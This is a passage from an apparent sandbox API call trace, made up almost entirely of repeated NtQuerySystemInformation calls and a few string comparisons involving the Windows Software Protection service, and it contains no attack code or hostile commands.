ResultLength=0x0) [0271.123] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.123] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc720, Length=0x20, ResultLength=0x0) [0271.123] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.123] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.123] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7b0, Length=0x38, ResultLength=0x0) [0271.123] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc640, Length=0x20, ResultLength=0x0) [0271.123] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5c0, Length=0x20, ResultLength=0x0) [0271.123] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.123] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5c0, Length=0x20, ResultLength=0x0) [0271.123] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.123] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5c0, Length=0x20, ResultLength=0x0) [0271.123] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.123] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.123] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.123] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.124] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7b0, Length=0x38, ResultLength=0x0) [0271.124] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc640, Length=0x20, ResultLength=0x0) [0271.124] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5c0, Length=0x20, ResultLength=0x0) [0271.124] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.124] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5c0, Length=0x20, ResultLength=0x0) [0271.124] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.124] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5c0, Length=0x20, ResultLength=0x0) [0271.124] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.124] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.124] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.124] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.124] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7b0, Length=0x38, ResultLength=0x0) [0271.124] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc640, Length=0x20, ResultLength=0x0) [0271.124] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5d0, Length=0x20, ResultLength=0x0) [0271.124] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.124] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.124] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.124] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5d0, Length=0x20, ResultLength=0x0) [0271.125] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.125] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.125] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.125] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.125] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.125] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.125] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.125] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb38, Length=0x50, ResultLength=0x0) [0271.125] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.125] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca60, Length=0x38, ResultLength=0x0) [0271.127] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.127] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc890, Length=0x28, ResultLength=0x0) [0271.127] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.127] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.127] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc890, Length=0x28, ResultLength=0x0) [0271.127] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.127] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.127] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc890, Length=0x28, ResultLength=0x0) [0271.127] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.127] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.128] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc890, Length=0x28, ResultLength=0x0) [0271.128] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.128] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.128] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc900, Length=0x28, ResultLength=0x0) [0271.128] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.128] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.128] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca60, Length=0x38, ResultLength=0x0) [0271.128] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.128] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc980, Length=0x28, ResultLength=0x0) [0271.131] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.132] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.132] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.132] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.132] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc980, Length=0x28, ResultLength=0x0) [0271.132] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.132] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.132] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca60, Length=0x38, ResultLength=0x0) [0271.132] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8e0, Length=0x20, ResultLength=0x0) [0271.132] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc860, Length=0x20, ResultLength=0x0) [0271.132] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.132] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc860, Length=0x20, ResultLength=0x0) [0271.132] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.132] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc860, Length=0x20, ResultLength=0x0) [0271.132] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.133] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.133] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.133] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.133] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca60, Length=0x38, ResultLength=0x0) [0271.133] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8e0, Length=0x20, ResultLength=0x0) [0271.133] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc870, Length=0x20, ResultLength=0x0) [0271.133] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.133] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.133] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.133] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc870, Length=0x20, ResultLength=0x0) [0271.133] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.133] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.133] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.133] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.133] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.133] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.134] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9e0, Length=0x50, ResultLength=0x0) [0271.134] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.134] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc910, Length=0x38, ResultLength=0x0) [0271.136] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.136] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc740, Length=0x28, ResultLength=0x0) [0271.136] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.136] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.136] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc740, Length=0x28, ResultLength=0x0) [0271.136] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.136] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.136] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc740, Length=0x28, ResultLength=0x0) [0271.136] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.136] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.137] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc740, Length=0x28, ResultLength=0x0) [0271.137] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.137] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.137] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7b0, Length=0x28, ResultLength=0x0) [0271.137] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.137] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.137] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc910, Length=0x38, ResultLength=0x0) [0271.137] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.137] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc830, Length=0x28, ResultLength=0x0) [0271.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc830, Length=0x28, ResultLength=0x0) [0271.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.140] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.140] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc910, Length=0x38, ResultLength=0x0) [0271.140] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc790, Length=0x20, ResultLength=0x0) [0271.140] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc710, Length=0x20, ResultLength=0x0) [0271.140] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.140] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc710, Length=0x20, ResultLength=0x0) [0271.140] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.140] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc710, Length=0x20, ResultLength=0x0) [0271.140] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.140] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.140] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.140] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.140] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc910, Length=0x38, ResultLength=0x0) [0271.140] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc790, Length=0x20, ResultLength=0x0) [0271.140] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc720, Length=0x20, ResultLength=0x0) [0271.140] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.140] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.141] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.141] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc720, Length=0x20, ResultLength=0x0) [0271.141] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.141] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.141] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.141] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.141] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.141] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.141] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0271.141] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9c8, Length=0x50, ResultLength=0x0) [0271.141] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.141] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8f0, Length=0x38, ResultLength=0x0) [0271.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc720, Length=0x28, ResultLength=0x0) [0271.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc720, Length=0x28, ResultLength=0x0) [0271.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc720, Length=0x28, ResultLength=0x0) [0271.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc790, Length=0x28, ResultLength=0x0) [0271.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8f0, Length=0x38, ResultLength=0x0) [0271.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc810, Length=0x28, ResultLength=0x0) [0271.146] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.146] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.146] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc810, Length=0x28, ResultLength=0x0) [0271.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8f0, Length=0x38, ResultLength=0x0) [0271.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc770, Length=0x20, ResultLength=0x0) [0271.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6f0, Length=0x20, ResultLength=0x0) [0271.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6f0, Length=0x20, ResultLength=0x0) [0271.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6f0, Length=0x20, ResultLength=0x0) [0271.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.148] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.148] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.148] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8f0, Length=0x38, ResultLength=0x0) [0271.148] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc770, Length=0x20, ResultLength=0x0) [0271.148] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc700, Length=0x20, ResultLength=0x0) [0271.148] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.148] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.148] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.148] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc700, Length=0x20, ResultLength=0x0) [0271.148] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.148] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.148] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.148] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.148] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.148] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.148] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.148] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.149] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.149] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfccd8, Length=0x50, ResultLength=0x0) [0271.149] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc50, Length=0x28, ResultLength=0x0) [0271.149] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0271.149] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.149] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.149] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfccd8, Length=0x50, ResultLength=0x0) [0271.149] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.149] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfccd8, Length=0x50, ResultLength=0x0) [0271.149] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcbc0, Length=0x50, ResultLength=0x0) [0271.149] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb40, Length=0x28, ResultLength=0x0) [0271.149] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0271.149] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.149] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.149] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcbc0, Length=0x50, ResultLength=0x0) [0271.149] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.149] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcbc0, Length=0x50, ResultLength=0x0) [0271.150] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.150] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcbc0, Length=0x50, ResultLength=0x0) [0271.150] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.150] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcaf0, Length=0x38, ResultLength=0x0) [0271.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc920, Length=0x28, ResultLength=0x0) [0271.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc920, Length=0x28, ResultLength=0x0) [0271.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc920, Length=0x28, ResultLength=0x0) [0271.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc990, Length=0x28, ResultLength=0x0) [0271.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcaf0, Length=0x38, ResultLength=0x0) [0271.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca10, Length=0x28, ResultLength=0x0) [0271.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, 